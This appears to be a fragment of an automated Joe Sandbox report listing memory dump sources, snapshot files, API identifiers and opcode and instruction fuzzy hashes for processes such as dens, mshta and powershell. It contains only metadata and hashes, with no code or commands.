                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067431978.00007FF62C131000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2067546616.00007FF62C134000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ff62c0f0000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                              • String ID: :
                                                                                                                                                                                                                                              • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction ID: 060f8aca37f7101514ec1ade1686fe941e9f572bbcd19a4c234d8adc1b82e3bd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8701D421D1860285FF30AF64A86B27E27A0EF58764F800036D98CC2681DF6CD5048B06
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$Err_FromUnicode_
                                                                                                                                                                                                                                              • String ID: no such name
                                                                                                                                                                                                                                              • API String ID: 3678473424-4211486178
                                                                                                                                                                                                                                              • Opcode ID: 3005c2e76ccdbfdbb1504f9de79cdf15a2dc4c168f6a8fbb72cf26d2d18b7585
                                                                                                                                                                                                                                              • Instruction ID: a0729c263327f922da9d416bca1d964ff361abd55f77e1f322592bb32397ea76
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3005c2e76ccdbfdbb1504f9de79cdf15a2dc4c168f6a8fbb72cf26d2d18b7585
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB014471B18A429AFB699B25E864BB57794BF99748F400071DA5E463DCEF2CF00E8708
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _PyObject_GC_New.PYTHON312(?,?,00000000,00007FFDFAA52513), ref: 00007FFDFAA525A6
                                                                                                                                                                                                                                              • PyObject_GC_Track.PYTHON312(?,?,00000000,00007FFDFAA52513), ref: 00007FFDFAA525D8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2068545702.00007FFDFAA51000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFDFAA50000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068513391.00007FFDFAA50000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAA55000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAB2000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAAFE000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB02000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB07000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068579406.00007FFDFAB5F000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068952212.00007FFDFAB62000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2068988243.00007FFDFAB64000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfaa50000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Object_$Track
                                                                                                                                                                                                                                              • String ID: 3.2.0
                                                                                                                                                                                                                                              • API String ID: 16854473-1786766648
                                                                                                                                                                                                                                              • Opcode ID: 05fdb2ae452a8d6f4b3be3f11c3efdbfda8cc49ab31c9f152460280c20d50ee3
                                                                                                                                                                                                                                              • Instruction ID: 2ab7fa2f5fc673f48fdfd49cc9d118be8056b69faf9173a6dac79ced4f79e147
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05fdb2ae452a8d6f4b3be3f11c3efdbfda8cc49ab31c9f152460280c20d50ee3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 13E0ED65F09B0699EB1D9F11EC6447833A8BF08714B5401B5CD6D023ACEF3CE55EC248
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2069057077.00007FFDFAB71000.00000020.00000001.01000000.00000017.sdmp, Offset: 00007FFDFAB70000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069023444.00007FFDFAB70000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069180687.00007FFDFACA5000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069226530.00007FFDFACD4000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2069264473.00007FFDFACD9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_7ffdfab70000_dens.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: memcpy
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3510742995-0
                                                                                                                                                                                                                                              • Opcode ID: a96ea90eb97579558f5840fa51574c942dcd478eace75b517b79044c6e37b100
                                                                                                                                                                                                                                              • Instruction ID: 2da717673adc2c4093e171b9969b1d10413d48817bfe23396404f2a38b03af4e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a96ea90eb97579558f5840fa51574c942dcd478eace75b517b79044c6e37b100
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9491BE71B0974686EB6C9E129560A7A2790FB44BE0F885276EE7D07BC9DF3CE4208700
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000001E.00000003.1792270892.000001E090900000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001E090900000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_30_3_1e090900000_mshta.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                              • Instruction ID: 580eda7287dcff6d5e5deed2c497d42588c4934408e62fa8b2e84b09ffed95e2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B90021449544755D42556914C4529C505163CC354FD44481891A90146D88D02D62152
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000052.00000002.1913209375.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_82_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 0c41217c95469c7bfdaf01b1baa091e3beeb7b98b54ae18fd2d22962e4b7389f
                                                                                                                                                                                                                                              • Instruction ID: 96e1cc28121cb802ef30958e383af1b978058824f0c9b39da61f6f589ce21956
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c41217c95469c7bfdaf01b1baa091e3beeb7b98b54ae18fd2d22962e4b7389f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F22D422B0DA890FE7AAA7EC58755B57BE1EF86250B0801FFD08DC71D7DE19B8468341
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000052.00000002.1912812313.00007FFD9A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A280000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_82_2_7ffd9a280000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 278a68c3535c026ecc5a3087ad5c448634409d061a38e6dc7da19f621bb4b0be
                                                                                                                                                                                                                                              • Instruction ID: 74ae476179351b726d121a264db93d9843b2466562329c09fc7e2125c4d278c3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 278a68c3535c026ecc5a3087ad5c448634409d061a38e6dc7da19f621bb4b0be
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68619471E09A498FDB59EFACD4556ACBBF1EF49310F1440AEE009DB292CA35A842CB41
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000052.00000002.1913209375.00007FFD9A350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A350000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_82_2_7ffd9a350000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: a8794da97976f00cf3063f0be6a640b1e60e9840f597043eb400ab73fda255f1
                                                                                                                                                                                                                                              • Instruction ID: d8f88e117b77964c4fd87690ad5dafd7208afa0d428fd924d4eb1e9646200b40
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8794da97976f00cf3063f0be6a640b1e60e9840f597043eb400ab73fda255f1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D131D423B1CA094BE77DB6EC58B52BA37D2EF85210F5811BEE04DC7196DE28BC468241
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000052.00000002.1912812313.00007FFD9A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9A280000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_82_2_7ffd9a280000_powershell.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                              • Instruction ID: 7a3a586c851a1ccafda8701cde1dadcde02ca82204846c0220faccd1016005cb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0201A73120CB0C4FD748EF0CE451AA5B3E0FB85364F10056DE58AC3695D632E881CB42